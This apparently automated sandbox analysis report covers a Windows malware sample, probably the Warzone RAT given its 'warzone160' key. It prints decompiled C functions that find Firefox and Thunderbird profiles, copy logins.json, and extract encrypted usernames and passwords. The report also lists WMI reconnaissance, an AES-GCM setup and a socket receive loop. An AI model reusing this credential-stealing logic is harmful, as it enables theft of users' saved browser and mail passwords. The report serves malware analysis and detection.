0x0040b07f
0x0040b088
0x0040b08b
0x0040b08b
0x0040b093
0x0040b099
0x0040b09b
0x0040b0a4
0x0040b0a9
0x0040b0ae
0x0040b0b8
0x0040b0c2
0x0040b0c8
0x0040b0cd
0x0040b0cd
0x0040b0d3
0x0040b0da
0x0040b0e1
0x0040b0e4
0x0040b0ec
0x0040b0ef
0x0040b0f7
0x0040b0fc
0x0040b0ff
0x0040b0ff
0x0040adac
0x0040ad7b
0x0040ad7b
0x0040ad7e
0x0040ad86
0x0040ad86
0x0040b102
0x0040b102
0x0040b12d
0x0040b137
0x0040b138
0x0040b138
0x0040b140
0x0040b140
0x0040b148
0x0040b150
0x0040b15b

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 0040C118: lstrcpyW.KERNEL32 ref: 0040C154
Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040C162
Part of subcall function 0040C118: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,0040A729), ref: 0040C17B
Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1

lstrcatW.KERNEL32(?,\firefox.exe), ref: 0040AC8C
GetBinaryTypeW.KERNEL32(?,?), ref: 0040AC9D
GetPrivateProfileStringW.KERNEL32 ref: 0040B11D

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404E98,?), ref: 00403581
Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 004035AC

CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,00414684,\logins.json,00000000), ref: 0040AE14

Strings

Path, xrefs: 0040B115
.tmp, xrefs: 0040ADFB
profiles.ini, xrefs: 0040ACDF
\firefox.exe, xrefs: 0040AC80
\logins.json, xrefs: 0040ADBA
hostname, xrefs: 0040AECC
firefox.exe, xrefs: 0040AC5E
\Mozilla\Firefox\, xrefs: 0040ACC6
Profile, xrefs: 0040AC1B, 0040ACEC, 0040AD1F
encryptedPassword, xrefs: 0040AF49
encryptedUsername, xrefs: 0040AE7C, 0040AF0C

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyDispatcherExceptionFileFreeOpenPrivateProfileQueryStringTypeUserValueVirtualwsprintf
String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
API String ID: 1388061207-815594582
Opcode ID: b4bde3a3e26f24d1afbe895baf55860a0aac4384e9442523867c872812094266
Instruction ID: 05fef4a50751129686bd6b09da35af6691d40134a587f0c9ecca06ce14b57531
Opcode Fuzzy Hash: b4bde3a3e26f24d1afbe895baf55860a0aac4384e9442523867c872812094266
Instruction Fuzzy Hash: E5E1F771900519ABDB15EFA2CC929EEBB79AF44308F10407FA506B71D2DF386E45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040A6C8(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				void* _t161;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				void* _t278;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E004035E5( &_v24, L"Profile"); // executed
				_t279 = 0;
				E00401052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00401052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0040C118(L"thunderbird.exe",  &_v704, _t396); // executed
				E004035E5( &_v44,  &_v704); // executed
				GetBinaryTypeW( &_v704,  &_v156);
				E0040362D(_t395,  &_v44); // executed
				_t289 = _t385; // executed
				_t161 = E0040B67E(_t385,  &_v704,  &_v44); // executed
				if(_t161 != 0) {
					L3:
					E0040346A( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0040362D( &_v36,  &_a4);
					E0040346A( &_v36, _t381, __eflags, L"profiles.ini");
					E00403437( &_v24, E004035E5( &_v40, L"Profile"));
					L00405EA5(_v40);
					E00403272( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E00403437( &_v24, E004035E5( &_v60, L"Profile"));
						L00405EA5(_v60);
						_v60 = _t279;
						E00403272( &_v24, _t381, __eflags, _v56 + 1);
						E0040362D( &_v12,  &_a4);
						E0040346A( &_v12, _t381, __eflags,  &_v1224);
						E00403554( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0040362D( &_v20,  &_v12);
									E0040346A( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E0040F76B( &_v16, _t382, __eflags);
									E0040346A( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E00403335( &_v16, __eflags, E004034A7( &_v64, _t381, __eflags));
									L00405EA5(_v64);
									_v64 = _t279;
									E0040346A( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E00403437( &_v20,  &_v16);
										_t386 = _v20;
									}
									E0040FECE( &_v184, __eflags);
									_t321 =  &_v180;
									E00403437(_t321,  &_v20);
									_push(_t321);
									_t200 = E00410192( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0040FE3D( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E004033BF( &_v104, "encryptedUsername");
										_t210 = L00402F22( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = L00409EB7(_t210, _t208, __eflags);
										_v108 = _t281;
										L00405EA5(_v160);
										_t332 = _v104;
										L00405EA5(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E004033BF( &_v116, "hostname");
												L00409EF0( &_v40, L00402F22( &_v52,  &_v112), __eflags, _t223, _t393);
												L00405EA5(_v112);
												L00405EA5(_v116);
												_t229 = E004033BF( &_v124, "encryptedUsername");
												L00409EF0( &_v84, L00402F22( &_v52,  &_v120), __eflags, _t229, _t393);
												L00405EA5(_v120);
												L00405EA5(_v124);
												_t235 = E004033BF( &_v132, "encryptedPassword");
												_t381 = L00402F22( &_v52,  &_v128);
												L00409EF0( &_v80, _t237, __eflags, _t235, _t393);
												L00405EA5(_v128);
												L00405EA5(_v132);
												E0040B15E(_t387, __eflags, _v84,  &_v136);
												E0040B15E(_t387, __eflags, _v80,  &_v144);
												E00403437( &_v100, E0040309D( &_v40, __eflags,  &_v68));
												L00405EA5(_v68);
												_v68 = 0;
												E00403437( &_v96, E0040309D(E004033BF( &_v140, _v136), __eflags,  &_v72));
												L00405EA5(_v72);
												_v72 = 0;
												L00405EA5(_v140);
												E00403437( &_v92, E0040309D(E004033BF( &_v148, _v144), __eflags,  &_v76));
												L00405EA5(_v76);
												_v76 = 0;
												L00405EA5(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												L00401F95(_t395,  &_v100);
												L00401FCB(_t387);
												L00405EA5(_v80);
												L00405EA5(_v84);
												L00405EA5(_v40);
												_t332 =  &_v100;
												E004013EF( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0040362D(_t395,  &_v16);
											E0040FF0B(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E00403036( &_v52);
										_t323 =  &_v184;
									}
									L0040FEED(_t323, __eflags);
									L00405EA5(_t392);
									_v16 = _t279;
									L00405EA5(_t386);
									_v20 = _t279;
									L00405EA5(_v28);
									L00405EA5(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							L00405EA5(_v28);
							L00405EA5(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0040B627(_t385);
					_t279 = 1;
					__eflags = 1;
					L00405EA5(_v36);
				} else {
					E0040362D(_t395,  &_v44); // executed
					_t278 = E0040B67E(_t385,  &_v704, _t289); // executed
					if(_t278 != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				L00405EA5(_v44);
				L00405EA5(_t389);
				L00405EA5(_a4);
				return _t279;
			}

0x0040a6c8
0x0040a6d4
0x0040a6de
0x0040a6e1
0x0040a6eb
0x0040a6f5
0x0040a6ff
0x0040a709
0x0040a711
0x0040a716
0x0040a719
0x0040a724
0x0040a734
0x0040a747
0x0040a754
0x0040a759
0x0040a75b
0x0040a762
0x0040a783
0x0040a78b
0x0040a797
0x0040a7a4
0x0040a7ba
0x0040a7c2
0x0040a7cb
0x0040a7d0
0x0040a7d3
0x0040abb9
0x0040abb9
0x0040abca
0x0040abd0
0x0040abd2
0x00000000
0x00000000
0x0040a7e5
0x0040a7f1
0x0040a7f9
0x0040a802
0x0040a805
0x0040a811
0x0040a820
0x0040a82c
0x0040a834
0x0040a838
0x0040a83a
0x0040a851
0x0040a857
0x0040a85d
0x0040a85f
0x00000000
0x0040a861
0x0040a865
0x0040a868
0x0040a86b
0x0040a86d
0x00000000
0x0040a86f
0x0040a876
0x0040a883
0x0040a88a
0x0040a88e
0x0040a89b
0x0040a8a2
0x0040a8af
0x0040a8b7
0x0040a8c4
0x0040a8c7
0x0040a8cc
0x0040a8cf
0x0040a8db
0x0040a8dd
0x0040a8e6
0x0040a8eb
0x0040a8eb
0x0040a8f4
0x0040a8fd
0x0040a903
0x0040a908
0x0040a914
0x0040a919
0x0040a91f
0x0040a921
0x0040a931
0x0040a935
0x0040a938
0x0040a945
0x0040a956
0x0040a95b
0x0040a96a
0x0040a96c
0x0040a96f
0x0040a974
0x0040a977
0x0040a97c
0x0040a97e
0x0040ab3f
0x0040ab3f
0x0040a984
0x0040a984
0x0040a987
0x0040a987
0x0040a989
0x0040a98c
0x0040a995
0x0040a998
0x0040a99b
0x0040a99e
0x0040a9b5
0x0040a9bf
0x0040a9c7
0x0040a9d5
0x0040a9ec
0x0040a9f6
0x0040a9fe
0x0040aa0c
0x0040aa1e
0x0040aa23
0x0040aa2d
0x0040aa35
0x0040aa46
0x0040aa57
0x0040aa6c
0x0040aa74
0x0040aa7c
0x0040aa9c
0x0040aaa4
0x0040aaaf
0x0040aab2
0x0040aad7
0x0040aadf
0x0040aaea
0x0040aaed
0x0040aaf2
0x0040aaf5
0x0040ab02
0x0040ab09
0x0040ab11
0x0040ab19
0x0040ab21
0x0040ab26
0x0040ab29
0x0040ab2e
0x0040ab2e
0x0040ab2e
0x0040ab37
0x0040ab3a
0x0040ab3a
0x0040ab42
0x0040ab48
0x0040ab4a
0x0040ab53
0x0040ab58
0x0040ab5d
0x0040ab67
0x0040ab71
0x0040ab77
0x0040ab7c
0x0040ab7c
0x0040ab82
0x0040ab89
0x0040ab90
0x0040ab93
0x0040ab9b
0x0040ab9e
0x0040aba6
0x0040abab
0x0040abab
0x0040a86d
0x0040a83c
0x0040a83c
0x0040a83f
0x0040a847
0x0040a847
0x0040abae
0x0040abb1
0x0040abb4
0x0040abb4
0x0040abda
0x0040abe4
0x0040abe4
0x0040abe5
0x0040a764
0x0040a76b
0x0040a772
0x0040a779
0x00000000
0x0040a77b
0x0040a77b
0x0040a77b
0x0040a779
0x0040abed
0x0040abf4
0x0040abfc
0x0040ac07

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 0040C118: lstrcpyW.KERNEL32 ref: 0040C154
Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040C162
Part of subcall function 0040C118: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,0040A729), ref: 0040C17B
Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1

GetBinaryTypeW.KERNEL32(?,0000000B), ref: 0040A747

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 0040B67E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?), ref: 0040B6B5
Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760,?,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040B7A3

GetPrivateProfileStringW.KERNEL32 ref: 0040ABCA

Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760,0000005A,.dll,?,0040A760), ref: 0040B7FF
Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,0040A760), ref: 0040B83E
Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?), ref: 0040B849
Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?), ref: 0040B854
Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?), ref: 0040B85F
Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?), ref: 0040B86A
Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?), ref: 0040B957

Strings

Path, xrefs: 0040ABC4
.tmp, xrefs: 0040A8BC
profiles.ini, xrefs: 0040A79C
\Thunderbird\, xrefs: 0040A783
\logins.json, xrefs: 0040A87B
hostname, xrefs: 0040A98D
Profile, xrefs: 0040A6D9, 0040A7A9, 0040A7E0
encryptedPassword, xrefs: 0040AA04
thunderbird.exe, xrefs: 0040A71F
encryptedUsername, xrefs: 0040A93D, 0040A9CD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePathlstrcpylstrlen$BinaryCloseDispatcherExceptionOpenPrivateProfileQueryStringTypeUserValuelstrcat
String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
API String ID: 4293655490-1863067114
Opcode ID: cec04d0f450cf6dfcc58a31020e17c2c98f9807a5aa0a7a1211e72cde87f1b6e
Instruction ID: a21d26196978709a3597642a7ada2c1c52c329a6473edbb69f38f4505bb928d0
Opcode Fuzzy Hash: cec04d0f450cf6dfcc58a31020e17c2c98f9807a5aa0a7a1211e72cde87f1b6e
Instruction Fuzzy Hash: 15E1FA71900118ABDB15EFA1CC929EEBB79AF44308F10407FA506B71D2DF386E45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F80E, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
CoInitialize.OLE32(00000000), ref: 0040F82C
CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?,?,?,?,?,?,?,?,?,00402D0C), ref: 0040F84A
VariantInit.OLEAUT32(?), ref: 0040F8CE

Strings

Name, xrefs: 0040F8E0
WQL, xrefs: 0040F8A6
root\CIMV2, xrefs: 0040F86A
SELECT Name FROM Win32_VideoController, xrefs: 0040F89C

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Initialize$CreateInitInstanceSecurityVariant
String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
API String ID: 2382742315-3227336550
Opcode ID: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
Instruction ID: 3360bb0e2bdd619f1c1acbb00a5b578425b81bf7c01421450e144227b1317e44
Opcode Fuzzy Hash: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
Instruction Fuzzy Hash: 42410875A00209ABCB14DB95CC48EDFBBB8EFC9B04B1484B9F515EB290D774A946CB24

Uniqueness

Uniqueness Score: -1.00%

Function 046994E0, Relevance: 13.7, APIs: 9, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 04699340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 0469938B
Part of subcall function 04699340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 046993CC
Part of subcall function 04699340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 046993EC
Part of subcall function 04699340: _malloc.LIBCMT ref: 046993F9
Part of subcall function 04699340: _free.LIBCMT ref: 04699408

GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 0469953B

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 04699572
_malloc.LIBCMT ref: 0469957A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 0469959E
_free.LIBCMT ref: 046995A5
GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 046995E0
GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 0469962E
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 04699663
_free.LIBCMT ref: 0469966C

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
String ID:
API String ID: 2298454362-0
Opcode ID: 8a817829dad8e99fc1db98e3cca3a981c99d1815d238e06898edb949ff314edf
Instruction ID: 71950b23efff03de0a9ac40edb6b27027ac3dc936c7369ab64de513706e2229a
Opcode Fuzzy Hash: 8a817829dad8e99fc1db98e3cca3a981c99d1815d238e06898edb949ff314edf
Instruction Fuzzy Hash: 4541C3B1A002149FFB259B64DC45BEA77ECEB19314F0445ACE509DB380FBB46E898B61

Uniqueness

Uniqueness Score: -1.00%

Function 046D6B50, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 588COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046D6CBE

Strings

d, xrefs: 046D6FA1
(, xrefs: 046D6F6C
invalid, xrefs: 046D7189
misuse at line %d of [%.10s], xrefs: 046D6B82, 046D71A7
API call with %s database connection pointer, xrefs: 046D718E
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046D6B78, 046D719D

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: ($API call with %s database connection pointer$d$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]
API String ID: 2102423945-2789757714
Opcode ID: 9febb90d53580026e8a973e31e0e8fed210768ff0e71f8a32d6f36f1b1253c8b
Instruction ID: dfabb6e711a156dfcdf2bc09df452858236e83dc5f7c2fef24f5e118fa69b65b
Opcode Fuzzy Hash: 9febb90d53580026e8a973e31e0e8fed210768ff0e71f8a32d6f36f1b1253c8b
Instruction Fuzzy Hash: F722ACB0E053019BEB24CF28D880B6AB7E5BF58708F08492DE9459B381F775F955CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCB4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF

Strings

ChainingModeGCM, xrefs: 0040CCDE
ChainingMode, xrefs: 0040CCE3
AES, xrefs: 0040CCC7

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 1692524283-1213888626
Opcode ID: 8b4356a64ce3d25b02d10bebd446d6e763124582b34bcac112f35affbbc91d61
Instruction ID: 580d46d73ecae701cb98036a35daebd8e93ce6f3490be188a49db603675c50b1
Opcode Fuzzy Hash: 8b4356a64ce3d25b02d10bebd446d6e763124582b34bcac112f35affbbc91d61
Instruction Fuzzy Hash: 4CF01271341325BBDB240B5ADD49FDBBFACEF9ABA1B204037F505E2190D6B1580197E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040562F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040562F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t47;
				void* _t51;
				char* _t54;
				intOrPtr _t79;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t114;
				char* _t115;
				char _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t114 = __edx;
				_t89 = __ecx;
				_t47 = E00401190(0x10040, __ecx);
				_t88 = _t89;
				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4); // executed
					_t117 = 0;
					E00401052( &_v65600, 0, 0xffff);
					_t120 = _t119 + 0xc;
					_v60 = 0;
					_v56 = 0;
					_t51 = E004033BF( &_v12, "warzone160"); // executed
					E00403003( &_v52, _t114, _t51);
					L00405EA5(_v12);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t54 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117); // executed
						_t115 = _t54;
						if(_t115 != 0xc) {
							goto L8;
						}
						_v16 = _t117;
						_t106 =  &_v16;
						_v12 = _t117;
						L00402F91( &_v16,  &_v65600, _t54);
						_t107 = _t120;
						E0040304C(_t120,  &_v16);
						E0040304C(_t120,  &_v52);
						E004060AA( &_v44, _t114, _t120, _t107,  &_v16, _t106);
						_t120 = _t120 + 0x10;
						_t79 =  *((intOrPtr*)(_v44 + 4));
						_t118 = _t79 + 0xc;
						if(_t79 == 0 || _t118 == _t115) {
							L7:
							E00403036( &_v44);
							E00403036( &_v16);
							L9:
							_t96 =  &_v24;
							L00402F91( &_v24,  &_v65600, _t115); // executed
							_t97 = _t120;
							E0040304C(_t120,  &_v24);
							E0040304C(_t120,  &_v52);
							E004060AA( &_v36, _t114, _t120, _t97,  &_v24, _t96); // executed
							_t120 = _t120 + 0x10;
							L00402FC3(_t88 + 0x10);
							L00402F91(_t88 + 0x10, _v36, _t115); // executed
							L00402FC3( &_v24);
							L00402FC3( &_v36);
							E00404F65(_t88, _t114, _a4); // executed
							E00403036( &_v36);
							if(_t115 <= 0) {
								goto L12;
							}
							_t117 = 0;
							continue;
						} else {
							while(1) {
								_t85 =  &_v65600 + _t115;
								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0); // executed
								if(_t85 == 0xffffffff) {
									break;
								}
								_t115 = _t115 + _t85;
								if(_t118 != _t115) {
									continue;
								}
								goto L7;
							}
							E00403036( &_v44);
							E00403036( &_v16);
							L12:
							E00403036( &_v24);
							E00403036( &_v52);
							return E00403036( &_v60);
						}
						L8:
						if(_t115 == 0xffffffff) {
							goto L12;
						}
						goto L9;
					}
				}
				return _t47;
			}

0x0040562f
0x0040562f
0x00405637
0x0040563d
0x00405645
0x00405650
0x00405666
0x0040566d
0x00405677
0x0040567c
0x0040567f
0x00405685
0x0040568d
0x00405696
0x0040569e
0x004056a3
0x004056a6
0x004056a9
0x004056ac
0x004056b6
0x004056bc
0x004056c1
0x00000000
0x00000000
0x004056ce
0x004056d2
0x004056d5
0x004056d8
0x004056e2
0x004056e5
0x004056f2
0x004056fa
0x00405702
0x00405705
0x00405708
0x0040570d
0x0040573b
0x0040573e
0x00405746
0x00405756
0x0040575e
0x00405761
0x0040576b
0x0040576e
0x0040577b
0x00405783
0x00405788
0x0040578e
0x0040579a
0x004057a2
0x004057aa
0x004057b4
0x004057bc
0x004057c3
0x00000000
0x00000000
0x004057c5
0x00000000
0x00405713
0x00405713
0x00405720
0x00405726
0x0040572f
0x00000000
0x00000000
0x00405735
0x00405739
0x00000000
0x00000000
0x00000000
0x00405739
0x004057cf
0x004057d7
0x004057dc
0x004057df
0x004057e7
0x00000000
0x004057ef
0x0040574d
0x00405750
0x00000000
0x00000000
0x00000000
0x00405750
0x004056a9
0x004057f8

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405666

Part of subcall function 004033BF: lstrlenA.KERNEL32(?,74B60770,?,00405A4F,h\HA,00000000), ref: 004033C8
Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

recv.WS2_32(000000FF,?,0000000C,00000000), ref: 004056B6
recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405726

Strings

warzone160, xrefs: 00405688
`, xrefs: 00405650

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
String ID: `$warzone160
API String ID: 3973575906-811885577
Opcode ID: 47e42df10be03affcba100174f1a232a46aff3e394c5f05d4781cea89dfadeb7
Instruction ID: 13b9312c21fac82d743b2aac4943a07556a81bf37369194c12953ac8d4d921d3
